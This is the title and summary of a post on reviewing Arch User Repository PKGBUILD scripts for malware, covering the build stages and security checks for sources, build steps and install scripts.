How to review an AUR package
Summary
This post provides guidance on reviewing AUR packaging scripts (PKGBUILD) in light of malware incidents. It explains what PKGBUILD files are, outlines the four build stages, and gives practical security-focused checks for sources, build steps, and install scripts, while noting the open, volunteer-driven nature of the AUR.